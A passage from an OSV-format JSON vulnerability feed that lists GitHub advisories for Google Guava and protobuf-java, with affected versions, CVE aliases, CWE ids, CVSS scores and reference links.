"https://lists.apache.org/thread.html/rfc27e2727a20a574f39273e0432aa97486a332f9b3068f6ac1346594%40%3Cdev.myfaces.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf9f0fa84b8ae1a285f0210bafec6de2a9eba083007d04640b82aa625@%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf9f0fa84b8ae1a285f0210bafec6de2a9eba083007d04640b82aa625%40%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf00b688ffa620c990597f829ff85fdbba8bf73ee7bfb34783e1f0d4e@%3Cyarn-dev.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf00b688ffa620c990597f829ff85fdbba8bf73ee7bfb34783e1f0d4e%40%3Cyarn-dev.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/reebbd63c25bc1a946caa419cec2be78079f8449d1af48e52d47c9e85@%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/reebbd63c25bc1a946caa419cec2be78079f8449d1af48e52d47c9e85%40%3Cissues.geode.apache.org%3E" }, { "type": "WEB", 
"url": "https://lists.apache.org/thread.html/re120f6b3d2f8222121080342c5801fdafca2f5188ceeb3b49c8a1d27@%3Cyarn-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re120f6b3d2f8222121080342c5801fdafca2f5188ceeb3b49c8a1d27%40%3Cyarn-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd7e12d56d49d73e2b8549694974b07561b79b05455f7f781954231bf@%3Cdev.pig.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd7e12d56d49d73e2b8549694974b07561b79b05455f7f781954231bf%40%3Cdev.pig.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra7ab308481ee729f998691e8e3e02e93b1dedfc98f6b1cd3d86923b3%40%3Cyarn-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4776f62dfae4a0006658542f43034a7fc199350e35a66d4e18164ee6%40%3Ccommits.cxf.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3dd8881de891598d622227e9840dd7c2ef1d08abbb49e9690c7ae1bc@%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3dd8881de891598d622227e9840dd7c2ef1d08abbb49e9690c7ae1bc%40%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3c3b33ee5bef0c67391d27a97cbfd89d44f328cf072b601b58d4e748@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3c3b33ee5bef0c67391d27a97cbfd89d44f328cf072b601b58d4e748%40%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2fe45d96eea8434b91592ca08109118f6308d60f6d0e21d52438cfb4@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2fe45d96eea8434b91592ca08109118f6308d60f6d0e21d52438cfb4%40%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r294be9d31c0312d2c0837087204b5d4bf49d0552890e6eec716fa6a6@%3Cyarn-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r294be9d31c0312d2c0837087204b5d4bf49d0552890e6eec716fa6a6%40%3Cyarn-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r215b3d50f56faeb2f9383505f3e62faa9f549bb23e8a9848b78a968e@%3Ccommits.ws.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r215b3d50f56faeb2f9383505f3e62faa9f549bb23e8a9848b78a968e%40%3Ccommits.ws.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r161b87f8037bbaff400194a63cd2016c9a69f5949f06dcc79beeab54@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r161b87f8037bbaff400194a63cd2016c9a69f5949f06dcc79beeab54%40%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r07ed3e4417ad043a27bee7bb33322e9bfc7d7e6d1719b8e3dfd95c14@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r07ed3e4417ad043a27bee7bb33322e9bfc7d7e6d1719b8e3dfd95c14%40%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r037fed1d0ebde50c9caf8d99815db3093c344c3f651c5a49a09824ce@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r007add131977f4f576c232b25e024249a3d16f66aad14a4b52819d21@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r007add131977f4f576c232b25e024249a3d16f66aad14a4b52819d21%40%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "PACKAGE", "url": "https://github.com/google/guava" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r841c5e14e1b55281523ebcde661ece00b38a0569e00ef5e12bd5f6ba@%3Cissues.maven.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r841c5e14e1b55281523ebcde661ece00b38a0569e00ef5e12bd5f6ba%40%3Cissues.maven.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7b0e81d8367264d6cad98766a469d64d11248eb654417809bfdacf09@%3Cyarn-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7b0e81d8367264d6cad98766a469d64d11248eb654417809bfdacf09%40%3Cyarn-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r79e47ed555bdb1180e528420a7a2bb898541367a29a3bc6bbf0baf2c@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r79e47ed555bdb1180e528420a7a2bb898541367a29a3bc6bbf0baf2c%40%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r68d86f4b06c808204f62bcb254fcb5b0432528ee8d37a07ef4bc8222@%3Ccommits.ws.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r68d86f4b06c808204f62bcb254fcb5b0432528ee8d37a07ef4bc8222%40%3Ccommits.ws.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6874dfe26eefc41b7c9a5e4a0487846fc4accf8c78ff948b24a1104a@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6874dfe26eefc41b7c9a5e4a0487846fc4accf8c78ff948b24a1104a%40%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5d61b98ceb7bba939a651de5900dbd67be3817db6bfcc41c6e04e199@%3Cyarn-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5d61b98ceb7bba939a651de5900dbd67be3817db6bfcc41c6e04e199%40%3Cyarn-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5b3d93dfdfb7708e796e8762ab40edbde8ff8add48aba53e5ea26f44@%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r5b3d93dfdfb7708e796e8762ab40edbde8ff8add48aba53e5ea26f44%40%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r58a8775205ab1839dba43054b09a9ab3b25b423a4170b2413c4067ac@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r58a8775205ab1839dba43054b09a9ab3b25b423a4170b2413c4067ac%40%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r49549a8322f62cd3acfa4490d25bfba0be04f3f9ff4d14fe36199d27@%3Cyarn-dev.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r49549a8322f62cd3acfa4490d25bfba0be04f3f9ff4d14fe36199d27%40%3Cyarn-dev.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4776f62dfae4a0006658542f43034a7fc199350e35a66d4e18164ee6@%3Ccommits.cxf.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-173", "CWE-200", "CWE-378", "CWE-732" ], "github_reviewed": true, "github_reviewed_at": "2021-03-25T17:01:09Z", "nvd_published_at": "2020-12-10T23:15:00Z", "severity": "LOW" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-7g45-4rm6-3mm3", "published": "2023-06-14T18:30:38Z", "modified": "2025-11-04T17:01:34.109082Z", "aliases": [ "CGA-g8pm-vcpp-9jxq", "CVE-2023-2976" ], "related": [ "CGA-3qxr-rw2h-5f86", "CGA-5wxh-2846-4r2x", "CGA-6p73-mwqp-2hp8", "CGA-7xcf-rqw8-qr59", "CGA-955j-7j6c-gqwh", "CGA-cwxg-jg7f-p246", "CGA-gghr-qw4h-4xq9", "CGA-jf73-gm5w-p8jg", "CGA-jwxg-cjjq-4858", "CGA-pp53-gp7c-m793", "CGA-pq38-jvh7-23gx", "CGA-px7h-7xf8-q54x", "CGA-q6xm-fh5w-65wh", "CGA-x223-m8f5-c9vm" ], "summary": "Guava vulnerable to insecure use of temporary directory", "details": "Use of Java's default temporary directory for file creation in `FileBackedOutputStream` in Google Guava versions 1.0 to 31.1 on Unix systems and Android Ice 
Cream Sandwich allows other users and apps on the machine with access to the default Java temporary directory to be able to access the files created by the class.\n\nEven though the security vulnerability is fixed in version 32.0.0, maintainers recommend using version 32.0.1 as version 32.0.0 breaks some functionality under Windows.", "affected": [ { "package": { "name": "com.google.guava:guava", "ecosystem": "Maven", "purl": "pkg:maven/com.google.guava/guava" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.0" }, { "fixed": "32.0.0-android" } ] } ], "versions": [ "10.0", "10.0-rc1", "10.0-rc2", "10.0-rc3", "10.0.1", "11.0", "11.0-rc1", "11.0.1", "11.0.2", "12.0", "12.0-rc1", "12.0-rc2", "12.0.1", "13.0", "13.0-rc1", "13.0-rc2", "13.0.1", "14.0", "14.0-rc1", "14.0-rc2", "14.0-rc3", "14.0.1", "15.0", "15.0-rc1", "16.0", "16.0-rc1", "16.0.1", "17.0", "17.0-rc1", "17.0-rc2", "18.0", "18.0-rc1", "18.0-rc2", "19.0", "19.0-rc1", "19.0-rc2", "19.0-rc3", "20.0", "20.0-rc1", "21.0", "21.0-rc1", "21.0-rc2", "22.0", "22.0-android", "22.0-rc1", "22.0-rc1-android", "23.0", "23.0-android", "23.0-rc1", "23.0-rc1-android", "23.1-android", "23.1-jre", "23.2-android", "23.2-jre", "23.3-android", "23.3-jre", "23.4-android", "23.4-jre", "23.5-android", "23.5-jre", "23.6-android", "23.6-jre", "23.6.1-android", "23.6.1-jre", "24.0-android", "24.0-jre", "24.1-android", "24.1-jre", "24.1.1-android", "24.1.1-jre", "25.0-android", "25.0-jre", "25.1-android", "25.1-jre", "26.0-android", "26.0-jre", "27.0-android", "27.0-jre", "27.0.1-android", "27.0.1-jre", "27.1-android", "27.1-jre", "28.0-android", "28.0-jre", "28.1-android", "28.1-jre", "28.2-android", "28.2-jre", "29.0-android", "29.0-jre", "30.0-android", "30.0-jre", "30.1-android", "30.1-jre", "30.1.1-android", "30.1.1-jre", "31.0-android", "31.0-jre", "31.0.1-android", "31.0.1-jre", "31.1-android", "31.1-jre" ], "database_specific": { "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/06/GHSA-7g45-4rm6-3mm3/GHSA-7g45-4rm6-3mm3.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-2976" }, { "type": "WEB", "url": "https://github.com/google/guava/issues/2575" }, { "type": "WEB", "url": "https://github.com/google/guava/issues/6532" }, { "type": "WEB", "url": "https://github.com/google/guava/commit/feb83a1c8fd2e7670b244d5afd23cba5aca43284" }, { "type": "PACKAGE", "url": "https://github.com/google/guava" }, { "type": "WEB", "url": "https://github.com/google/guava/releases/tag/v32.0.0" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20230818-0008" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20241108-0002" }, { "type": "WEB", "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01006.html" } ], "database_specific": { "cwe_ids": [ "CWE-379", "CWE-552" ], "github_reviewed": true, "github_reviewed_at": "2023-06-14T21:01:07Z", "nvd_published_at": "2023-06-14T18:15:09Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-mvr2-9pj6-7w5j", "published": "2020-06-15T20:35:11Z", "modified": "2024-10-22T05:29:03.107335Z", "aliases": [ "CGA-8223-gxg7-8cjf", "CVE-2018-10237" ], "related": [ "CGA-4jxw-mwcp-83m9" ], "summary": "Denial of Service in Google Guava", "details": "Unbounded memory allocation in Google Guava 11.0 through 24.x before 24.1.1 allows remote attackers to conduct denial of service attacks against servers that depend on this library and deserialize attacker-provided data, because the AtomicDoubleArray class (when serialized with Java serialization) and the CompoundOrdering class (when serialized with GWT serialization) perform eager allocation without appropriate checks on what a client has sent and whether the data size is 
reasonable.", "affected": [ { "package": { "name": "com.google.guava:guava", "ecosystem": "Maven", "purl": "pkg:maven/com.google.guava/guava" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0" }, { "fixed": "24.1.1-android" } ] } ], "versions": [ "11.0", "11.0.1", "11.0.2", "12.0", "12.0-rc1", "12.0-rc2", "12.0.1", "13.0", "13.0-rc1", "13.0-rc2", "13.0.1", "14.0", "14.0-rc1", "14.0-rc2", "14.0-rc3", "14.0.1", "15.0", "15.0-rc1", "16.0", "16.0-rc1", "16.0.1", "17.0", "17.0-rc1", "17.0-rc2", "18.0", "18.0-rc1", "18.0-rc2", "19.0", "19.0-rc1", "19.0-rc2", "19.0-rc3", "20.0", "20.0-rc1", "21.0", "21.0-rc1", "21.0-rc2", "22.0", "22.0-android", "22.0-rc1", "22.0-rc1-android", "23.0", "23.0-android", "23.0-rc1", "23.0-rc1-android", "23.1-android", "23.1-jre", "23.2-android", "23.2-jre", "23.3-android", "23.3-jre", "23.4-android", "23.4-jre", "23.5-android", "23.5-jre", "23.6-android", "23.6-jre", "23.6.1-android", "23.6.1-jre", "24.0-android", "24.0-jre", "24.1-android", "24.1-jre" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-mvr2-9pj6-7w5j/GHSA-mvr2-9pj6-7w5j.json" } }, { "package": { "name": "com.google.guava:guava-jdk5", "ecosystem": "Maven", "purl": "pkg:maven/com.google.guava/guava-jdk5" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "last_affected": "17.0" } ] } ], "versions": [ "13.0", "14.0.1", "14.0.1-rc1", "16.0", "16.0-rc1", "17.0", "17.0-rc1", "17.0-rc2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-mvr2-9pj6-7w5j/GHSA-mvr2-9pj6-7w5j.json" } }, { "package": { "name": "com.googlecode.guava-osgi:guava-osgi", "ecosystem": "Maven", "purl": "pkg:maven/com.googlecode.guava-osgi/guava-osgi" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "last_affected": "11.0.1" } ] } ], "versions": [ "10.0.0", "10.0.1", "11.0.0", 
"11.0.1", "3.0.0", "4.0.0", "5.0.0", "6.0.0", "7.0.0", "8.0.0", "9.0.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-mvr2-9pj6-7w5j/GHSA-mvr2-9pj6-7w5j.json" } }, { "package": { "name": "de.mhus.ports:vaadin-shared-deps", "ecosystem": "Maven", "purl": "pkg:maven/de.mhus.ports/vaadin-shared-deps" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "last_affected": "7.4.0" } ] } ], "versions": [ "1.3.1", "1.3.4", "1.3.6", "1.3.7", "1.6.0", "1.6.1", "6.2.0", "7.0.0", "7.1.0", "7.2.0", "7.4.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-mvr2-9pj6-7w5j/GHSA-mvr2-9pj6-7w5j.json" } }, { "package": { "name": "org.hudsonci.lib.guava:guava", "ecosystem": "Maven", "purl": "pkg:maven/org.hudsonci.lib.guava/guava" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "last_affected": "14.0.1-h-3" } ] } ], "versions": [ "14.0.1-h-1", "14.0.1-h-2", "14.0.1-h-3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-mvr2-9pj6-7w5j/GHSA-mvr2-9pj6-7w5j.json" } }, { "package": { "name": "org.sonatype.sisu:sisu-guava", "ecosystem": "Maven", "purl": "pkg:maven/org.sonatype.sisu/sisu-guava" }, "versions": [ "0.11.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-mvr2-9pj6-7w5j/GHSA-mvr2-9pj6-7w5j.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-10237" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2423" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r223bc776a077d0795786c38cbc6e7dd808fce1a9161b00ba9c0a5d55@%3Cissues.lucene.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r22c8173b804cd4a420c43064ba4e363d0022aa421008b1989f7354d4@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r27eb79a87a760335226dbfa6a7b7bffea539a535f8e80c41e482106d@%3Cdev.cxf.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2ea4e5e5aa8ad73b001a466c582899620961f47d77a40af712c1fdf9@%3Cdev.cxf.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r30e7d7b6bfa630dacc41649a0e96dad75165d50474c1241068aa0f94@%3Cissues.storm.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r352e40ca9874d1beb4ad95403792adca7eb295e6bc3bd7b65fabcc21@%3Ccommits.samza.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r38e2ab87528d3c904e7fac496e8fd766b9277656ff95b97d6b6b6dcd@%3Cdev.cxf.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3c3b33ee5bef0c67391d27a97cbfd89d44f328cf072b601b58d4e748@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r43491b25b2e5c368c34b106a82eff910a5cea3e90de82ad75cc16540@%3Cdev.syncope.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r50fc0bcc734dd82e691d36d209258683141bfc0083739a77e56ad92d@%3Cdev.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r841c5e14e1b55281523ebcde661ece00b38a0569e00ef5e12bd5f6ba@%3Cissues.maven.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r95799427b335807a4c54776908125c3e66597b65845ae50096d9278a@%3Cdev.cxf.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra0adb9653c7de9539b93cc8434143b655f753b9f60580ff260becb2b@%3Cusers.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra4f44016926dcb034b3b230280a18102062f94ae55b8a31bb92fed84@%3Cissues.lucene.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/ra8906723927aef2a599398c238eacfc845b74d812e0093ec2fc70a7d@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb3da574c34bc6bd37972d2266af3093b90d7e437460423c24f477919@%3Cissues.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc78f6e84f82cc662860e96526d8ab969f34dbe12dc560e22d9d147a3@%3Cdev.cxf.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc8467f357b943ceaa86f289f8bc1a5d1c7955b75d3bac1426f2d4ac1@%3Ccommon-dev.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd01f5ff0164c468ec7abc96ff7646cea3cce6378da2e4aa29c6bcb95@%3Cgithub.arrow.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd0c8ec6e044aa2958dd0549ebf8ecead7f5968c9474ba73a504161b2@%3Cdev.cxf.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdc56c15693c236e31e1e95f847b8e5e74fc0a05741d47488e7fc8c45@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20220629-0008" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2424" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2425" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2428" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2598" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2643" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2740" }, { "type": "WEB", "url": 
"https://access.redhat.com/errata/RHSA-2018:2741" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2742" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2743" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2927" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2858" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3149" }, { "type": "PACKAGE", "url": "https://github.com/google/guava" }, { "type": "WEB", "url": "https://github.com/google/guava/wiki/CVE-2018-10237" }, { "type": "WEB", "url": "https://groups.google.com/d/topic/guava-announce/xqWALw4W1vs/discussion" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/053d9ce4d579b02203db18545fee5e33f35f2932885459b74d1e4272@%3Cissues.activemq.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/19fa48533bc7ea1accf6b12746a74ed888ae6e49a5cf81ae4f807495@%3Ccommon-dev.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/33c6bccfeb7adf644d4d79894ca8f09370be6ed4b20632c2e228d085@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/3d5dbdd92ac9ceaef90e40f78599f9109f2f345252e0ac9d98e7e084@%3Cgitbox.activemq.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/3ddd79c801edd99c0978e83dbe2168ebd36fd42acfa5dac38fb03dd6@%3Cissues.activemq.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/cc48fe770c45a74dc3b37ed0817393e0c96701fc49bc431ed922f3cc@%3Chdfs-dev.hadoop.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r02e39d7beb32eebcdbb4b516e95f67d71c90d5d462b26f4078d21eeb@%3Cdev.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r02e39d7beb32eebcdbb4b516e95f67d71c90d5d462b26f4078d21eeb@%3Cuser.flink.apache.org%3E" }, { "type": "WEB", "url": "http://www.securitytracker.com/id/1041707" } ], "database_specific": { "cwe_ids": [ "CWE-502", "CWE-770" ], "github_reviewed": true, "github_reviewed_at": "2020-06-11T18:34:57Z", "nvd_published_at": "2018-04-26T21:29:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-4gg5-vx3j-xwc7", "published": "2022-12-12T15:30:33Z", "modified": "2025-09-02T19:53:43.821640Z", "aliases": [ "CGA-24m5-8f5h-34wq", "CVE-2022-3510" ], "related": [ "CGA-fgmv-5mj3-v9vh", "CGA-g664-j68v-pmw2", "CGA-rh7m-9hc4-75h6" ], "summary": "Protobuf Java vulnerable to Uncontrolled Resource Consumption", "details": "A parsing issue similar to CVE-2022-3171, but with Message-Type Extensions in protobuf-java core and lite versions prior to 3.21.7, 3.20.3, 3.19.6 and 3.16.3 can lead to a denial of service attack. Inputs containing multiple instances of non-repeated embedded messages with repeated or unknown fields causes objects to be converted back-n-forth between mutable and immutable forms, resulting in potentially long garbage collection pauses. 
We recommend updating to the versions mentioned above.", "affected": [ { "package": { "name": "com.google.protobuf:protobuf-java", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-java" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.0.0" }, { "fixed": "3.16.3" } ] } ], "versions": [ "3.0.0", "3.0.2", "3.1.0", "3.10.0", "3.10.0-rc-1", "3.11.0", "3.11.0-rc-1", "3.11.0-rc-2", "3.11.1", "3.11.3", "3.11.4", "3.12.0", "3.12.0-rc-1", "3.12.0-rc-2", "3.12.1", "3.12.2", "3.12.4", "3.13.0", "3.13.0-rc-3", "3.14.0", "3.14.0-rc-1", "3.14.0-rc-2", "3.14.0-rc-3", "3.15.0", "3.15.0-rc-1", "3.15.0-rc-2", "3.15.1", "3.15.2", "3.15.3", "3.15.4", "3.15.5", "3.15.6", "3.15.7", "3.15.8", "3.16.0", "3.16.0-rc-1", "3.16.0-rc-2", "3.16.1", "3.2.0", "3.2.0-rc.1", "3.2.0rc2", "3.3.0", "3.3.1", "3.4.0", "3.5.0", "3.5.1", "3.6.0", "3.6.1", "3.7.0", "3.7.0-rc1", "3.7.1", "3.8.0", "3.8.0-rc-1", "3.9.0", "3.9.0-rc-1", "3.9.1", "3.9.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/12/GHSA-4gg5-vx3j-xwc7/GHSA-4gg5-vx3j-xwc7.json" } }, { "package": { "name": "com.google.protobuf:protobuf-java", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-java" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.17.0" }, { "fixed": "3.19.6" } ] } ], "versions": [ "3.17.0", "3.17.1", "3.17.2", "3.17.3", "3.18.0", "3.18.0-rc-1", "3.18.0-rc-2", "3.18.1", "3.18.2", "3.18.3", "3.19.0", "3.19.0-rc-1", "3.19.0-rc-2", "3.19.1", "3.19.2", "3.19.3", "3.19.4", "3.19.5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/12/GHSA-4gg5-vx3j-xwc7/GHSA-4gg5-vx3j-xwc7.json" } }, { "package": { "name": "com.google.protobuf:protobuf-java", "ecosystem": "Maven", "purl": "pkg:maven/com.google.protobuf/protobuf-java" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.20.0" }, { "fixed": 
